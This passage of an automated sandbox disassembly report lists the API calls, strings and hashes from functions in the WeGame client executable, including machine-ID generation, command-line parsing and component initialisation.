                                                                • Instruction Fuzzy Hash: DF518EB1940228ABEB22DB60CC4AFDDB77CAB15724F4001D5E518AB1D1EBB85B85CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD874AD
                                                                • __Init_thread_footer.LIBCMT ref: 6BD87844
                                                                  • Part of subcall function 6BD5F669: __EH_prolog3_catch.LIBCMT ref: 6BD5F670
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD8754A
                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 6BD87575
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,00000288,?,0000015C,6BD27394,?,?,?,?,?,00000004), ref: 6BD87592
                                                                  • Part of subcall function 6BD5E4D4: __EH_prolog3_catch.LIBCMT ref: 6BD5E4DB
                                                                  • Part of subcall function 6BD1443B: memmove.VCRUNTIME140(00000003,00000000,00000000,00000003,00000000,?,6BD1461F,00000000,00000003,00000003,?,00000000,00000000,?,?), ref: 6BD1444E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AdaptersH_prolog3_catchInfo$?get_log_instance@base@@H_prolog3_catch_Init_thread_footerLogger@1@memmove
                                                                • String ID: %02x$GetAdaptersInfo result is NULL!$e:\dailybuild_dev\wegame_client\codes\common\src\machine_id.cpp$ecf4bb2d2496
                                                                • API String ID: 1435465011-922771384
                                                                • Opcode ID: 6edef11d1896210ab02430225f37c599e7265416278907b4691ed103d52b2d9b
                                                                • Instruction ID: 05febcda9bcb5dcea238018603a8b60bb3573f12a38d1413f114482825e597e9
                                                                • Opcode Fuzzy Hash: 6edef11d1896210ab02430225f37c599e7265416278907b4691ed103d52b2d9b
                                                                • Instruction Fuzzy Hash: 9B919A71905258EFCB21CF68C891BDDBBB5AF46328F5001E9D109AB290CB385F85DFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD260B1
                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260C6
                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000040,00000034,6BD27474,0000001C,6BD259BA,?,?,?,000000D4,6BD24672,?,?), ref: 6BD260D8
                                                                Strings
                                                                • __thiscall boost::uuids::detail::random_provider_base::random_provider_base(void), xrefs: 6BD26109
                                                                • e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp, xrefs: 6BD26104
                                                                • CryptAcquireContext, xrefs: 6BD260DE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: AcquireContextCryptErrorH_prolog3_Last
                                                                • String ID: CryptAcquireContext$__thiscall boost::uuids::detail::random_provider_base::random_provider_base(void)$e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\uuid\detail\random_provider_wincrypt.ipp
                                                                • API String ID: 2840587545-1175689356
                                                                • Opcode ID: 3b428808856cc6a55d569d19eec83902fd7f32c4f4a28c323cb7d859af135066
                                                                • Instruction ID: e06e275460307547e71168193ad21a6a540b5ee60c10a9ab597de74d8de6be37
                                                                • Opcode Fuzzy Hash: 3b428808856cc6a55d569d19eec83902fd7f32c4f4a28c323cb7d859af135066
                                                                • Instruction Fuzzy Hash: 1EF0F672911184A6EB21A7708C09F9E7A7C9F96718F500148B300AB154DB7D9A05D770
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF75163
                                                                • CryptGenRandom.ADVAPI32(00000000,?,00000000,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF7517A
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,6BF7318D,?,00000000,?,00000000,00000000,?,00000000), ref: 6BF75185
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: cdde9b72338dc3089770fe8c4b1b59459cd9a261b546cdc2d2865422c6b73fa8
                                                                • Instruction ID: 00f9931ecd8002887fa2a196796f36e003582a094580ceb35fc38b13b3c9e998
                                                                • Opcode Fuzzy Hash: cdde9b72338dc3089770fe8c4b1b59459cd9a261b546cdc2d2865422c6b73fa8
                                                                • Instruction Fuzzy Hash: CAE0123569410CBBEF106F94DD06F987B39EB05741F204195FE04951B0D7B29A219B94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetSystemInfo.KERNEL32(?), ref: 0040112F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: 12a1d864e7be8d677a1ff96fbe2d2fb40a12754e78c31473d3c613d729817b10
                                                                • Instruction ID: 963e66266f138d0cdaa1746b82e13d3d10b7b7171814ac18ee39b1200dc106ce
                                                                • Opcode Fuzzy Hash: 12a1d864e7be8d677a1ff96fbe2d2fb40a12754e78c31473d3c613d729817b10
                                                                • Instruction Fuzzy Hash: B7C04CB5D0430C9BCB00EFA5DE4989A7FFCBA0C204B4005B1E956E3350E671F9448BA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00460435
                                                                • GetCommandLineW.KERNEL32(000001A4,00459F62), ref: 00460446
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046047B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00460482
                                                                • GetCommandLineW.KERNEL32(?), ref: 004604E9
                                                                • CommandLineToArgvW.SHELL32(00000000), ref: 004604EC
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481394,00000000), ref: 00460524
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(004815D0,00000000), ref: 00460538
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481650,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046054C
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481658,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046055C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460579
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(00481650,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004605E4
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460601
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00460627
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 0046064D
                                                                • _wtoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000), ref: 00460673
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004606AE
                                                                • ?open_web@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 00460737
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000001,00000000,00000000,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 0046075C
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00460786
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/GameId,00000007), ref: 00460826
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/GameId,00000007), ref: 00460889
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/SkinName,00000009), ref: 0046094B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/SkinName,00000009), ref: 004609B4
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,?,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460A7F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/ChannelId,0000000A), ref: 00460AE8
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460BB3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/LockPosition,0000000D), ref: 00460C1C
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName,00000009), ref: 00460CE7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/SourceId,00000009), ref: 00460D50
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(?,0000000D,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId,0000000A,?,/SkinName), ref: 00460E0F
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00456131: __EH_prolog3_catch_GS.LIBCMT ref: 00456138
                                                                  • Part of subcall function 00456131: ?set_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@Z.COMMON(?,?,00000028), ref: 0045616F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,/PromoteId,0000000A), ref: 00460E75
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,00000001,00000000,00000000,http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a,0000004D), ref: 0046076C
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • LocalFree.KERNEL32(00000000), ref: 0046117F
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(0000000D,0000000D,?,/Proxy,00000006,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition,0000000D,?,/ChannelId), ref: 00460F2B
                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,none), ref: 00460F5C
                                                                • ?save_proxy_settings@client_helper@net@ierd_tgp@@YAXPBD@Z.COMMON(?), ref: 00460F7B
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAV45@@Z.COMMON(0000000C,0000000D,?,/QUICKLAUNCH,0000000C,?,/Proxy,00000006,?,/PromoteId,0000000A,?,/SourceId,00000009,?,/LockPosition), ref: 00460FD9
                                                                • ?TaskBarPin@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@_N@Z.COMMON(00000000,00000001,?,0000000D,wegame.exe,?,?,?,?,/QUICKLAUNCH,0000000C,?,/Proxy,00000006,?,/PromoteId), ref: 0046105A
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON(00000001,00000000,00000000,00000000), ref: 004610E0
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(?,00000001,00000001,00000000,00000000,00000000), ref: 004610F0
                                                                  • Part of subcall function 0045D749: __EH_prolog3_GS.LIBCMT ref: 0045D753
                                                                  • Part of subcall function 0045D749: ?is_regular_file@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,00000000,00000000,00000000), ref: 0045D812
                                                                  • Part of subcall function 0045D749: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(0000000D,?,?,?,00000000,00000000,00000000), ref: 0045D824
                                                                  • Part of subcall function 0045D749: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(00000000,?,0000000D,?,?,?,00000000,00000000,00000000), ref: 0045D83C
                                                                  • Part of subcall function 0045D749: ?copy_file@filesystem@ierd_tgp@@YAXABVpath@12@0W4copy_option@12@AAVerror_code@std@@@Z.COMMON(?,0000000A,00000001,?), ref: 0045D890
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?get_log_instance@base@@Logger@1@Sys_wrapper@common@ierd_tgp@@$?extract_op_from_cmd@D@2@@std@@0V45@@$wcscmp$_wtoi$CommandLineVerror_code@std@@@$?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@?report@D@2@@std@@H_prolog3_H_prolog3_catch_Qos@123@Qos@qos@adapt_for_imports@ierd_tgp@@Qos_data_base@234@Qos_occasion@234@@U?$char_traits@_V?$allocator@_V?$basic_string@_Vpath@12@W@std@@$?copy_file@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?is_regular_file@filesystem@ierd_tgp@@?open_web@?parent_path@path@filesystem@ierd_tgp@@?save_proxy_settings@client_helper@net@ierd_tgp@@?set_cfg_by_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@ArgvD@2@@4@@D@2@@std@@@D@2@@std@@@2@@property_tree@boost@@@FreeH_prolog3LocalPin@TaskU?$less@V123@V12@V?$basic_ptree@Vpath@12@0W4copy_option@12@W@2@@std@@W@2@@std@@__invalid_parameter_noinfo_noreturn_stricmpmemmove
                                                                • String ID: %$/ChannelId$/GameId$/LockPosition$/PromoteId$/Proxy$/QUICKLAUNCH$/SkinName$/SourceId$CommandLineToArgvW failed$YES$[App]Command line:[{}]$[App]This is a restart from assistant.$[App]This is the start from install.$[App]This is the start from uninstall.$[App]setted channel_id(%s) into cfg, set_rs:%d$[App]setted game_id(%s) into cfg, set_rs:%d$[App]setted lock_position(%s) into cfg, set_rs:%d$[App]setted promote_id(%s) into cfg, set_rs:%d$[App]setted skin(%s) into cfg, set_rs:%d$[App]setted source_id(%s) into cfg, set_rs:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a$initial.bind_by_game.channel_id$initial.bind_by_game.game_id$initial.bind_by_game.lock_position$initial.bind_by_game.skin$initial.bind_by_game.source_id$none$promote.netbar_promote.promote_id$wegame.exe
                                                                • API String ID: 2162744675-3570341653
                                                                • Opcode ID: 91d8ec46f779b043c992a44baca1edf82e4f8d84a87631d5e10cf3582d87064b
                                                                • Instruction ID: 8b0b7b16f85759ac185797cd59d15957763333e32cfc2a695004acddb4880b82
                                                                • Opcode Fuzzy Hash: 91d8ec46f779b043c992a44baca1edf82e4f8d84a87631d5e10cf3582d87064b
                                                                • Instruction Fuzzy Hash: B582D670D01258EEDB11EBA5CC41BEEBBB4AF15304F64409FE04577282EB785B49CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00459E95
                                                                • ??0Application@common@ierd_tgp@@QAE@HQAPAD_NKK1ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,?,?,?,?,?,000000B4), ref: 00459EDC
                                                                  • Part of subcall function 0045ABB2: __EH_prolog3.LIBCMT ref: 0045ABB9
                                                                  • Part of subcall function 0045ABB2: ??0WndMsgReceiver@Tenio@@QAE@XZ.COMMON(00000004,00459EF0,?,?,?,?,?,?,?,000000B4), ref: 0045ABC3
                                                                • GetTickCount.KERNEL32 ref: 00459F0F
                                                                • ?get_session_id@Application@common@ierd_tgp@@QAE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00459F21
                                                                  • Part of subcall function 0045F813: __EH_prolog3_catch_GS.LIBCMT ref: 0045F81A
                                                                  • Part of subcall function 0045F813: ?stamp_point@@YAXPBD@Z.COMMON(CrashReportLoaderInit begin,0000007C,00459F30,00000000,?), ref: 0045F824
                                                                  • Part of subcall function 0045F813: ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,?,?,?,?,?,?,0000007C,00459F30), ref: 0045F86A
                                                                  • Part of subcall function 0045F813: ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?), ref: 0045F8EF
                                                                  • Part of subcall function 0045F813: ?GetLastLoginedWegameId@common@ierd_tgp@@YAIXZ.COMMON(?), ref: 0045F8FB
                                                                  • Part of subcall function 0045F813: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F920
                                                                  • Part of subcall function 0045F813: ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON(?,?,?,?,00459F30,00000000,?), ref: 0045F92C
                                                                  • Part of subcall function 0045F813: SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045F94F
                                                                  • Part of subcall function 0045F813: ?Instance@CrashReportLoader@crash_report@@SAAAV12@XZ.ADAPT_FOR_IMPORTS ref: 0045F975
                                                                • OutputDebugStringW.KERNEL32(Tenio Initialize!,?), ref: 00459F42
                                                                  • Part of subcall function 0043EF54: __EH_prolog3.LIBCMT ref: 0043EF5B
                                                                  • Part of subcall function 0043E851: __EH_prolog3_GS.LIBCMT ref: 0043E858
                                                                  • Part of subcall function 0043E851: ?StartThread@CThread@@QAEHPAXH@Z.COMMON(00000000,00000000,00000050), ref: 0043E861
                                                                  • Part of subcall function 0043E851: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000000,00000050), ref: 0043E86A
                                                                  • Part of subcall function 0046042B: __EH_prolog3_GS.LIBCMT ref: 00460435
                                                                  • Part of subcall function 0046042B: GetCommandLineW.KERNEL32(000001A4,00459F62), ref: 00460446
                                                                  • Part of subcall function 0046042B: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?), ref: 0046047B
                                                                  • Part of subcall function 0046042B: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00460482
                                                                  • Part of subcall function 0046042B: GetCommandLineW.KERNEL32(?), ref: 004604E9
                                                                  • Part of subcall function 0046042B: CommandLineToArgvW.SHELL32(00000000), ref: 004604EC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00459F66
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(00000065), ref: 00459FC4
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON(?,31F73356-9B60-4B52-9FF0-F27E3A9BBEC2), ref: 00459FDE
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 00459FF8
                                                                • ?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ.COMMON ref: 0045A001
                                                                • ?get_quick_login_uin@common@ierd_tgp@@YAKXZ.COMMON(00000000,00000000), ref: 0045A00C
                                                                • ?report@Qos@qos@adapt_for_imports@ierd_tgp@@QAE_NABUQos_data_base@234@W4Qos_occasion@234@@Z.COMMON(00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A02B
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A040
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A050
                                                                • ??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z.COMMON(host_mgr.dll,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A06A
                                                                • PathFileExistsW.SHLWAPI(?,host_mgr.dll,?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045A07B
                                                                • LoadLibraryW.KERNEL32(host_mgr.dll), ref: 0045A086
                                                                • ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON ref: 0045A098
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(gen_all_components), ref: 0045A0CE
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(gen_all_components end), ref: 0045A0E0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A0E6
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(warming_up), ref: 0045A145
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(warming_up end), ref: 0045A157
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A15D
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON ref: 0045A1B7
                                                                • ?init@Component_mgr@common@ierd_tgp@@QAE_NXZ.COMMON ref: 0045A1BE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045A1C3
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON ref: 0045A21D
                                                                • ?inited@Component_mgr@common@ierd_tgp@@QAEXXZ.COMMON ref: 0045A224
                                                                • ?Init@WndMsgReceiver@Tenio@@QAE_NPBD@Z.COMMON(00000000), ref: 0045A234
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?PushAsyncTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@K@Z.COMMON ref: 0045A2A0
                                                                • GetTickCount.KERNEL32 ref: 0045A2A8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • String ID: 31F73356-9B60-4B52-9FF0-F27E3A9BBEC2$Tenio Initialize!$[main]comp inted$[main]exiting app started from install$[main]init comp$[main]warming_up$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$gen_all_components$gen_all_components end$host_mgr.dll$initalize$set_client_info$warming_up$warming_up end
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045F9DC
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA50
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000104,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA66
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA6D
                                                                • PathFindFileNameW.SHLWAPI(?,?,?,00000000,?,qbclient.dll,?,?,?,?,?,?,cfg_data.ini), ref: 0045FA7A
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045FAB3
                                                                • PathFileExistsW.SHLWAPI(?), ref: 0045FB1C
                                                                • DeleteFileW.KERNEL32(?), ref: 0045FB45
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000), ref: 0045FB5D
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FB64
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FBE0
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,00000639,0048BBC7), ref: 0045FC23
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,.bak), ref: 0045FC6F
                                                                • MoveFileW.KERNEL32(?,?), ref: 0045FCA1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045FCAB
                                                                Memory Dump Source
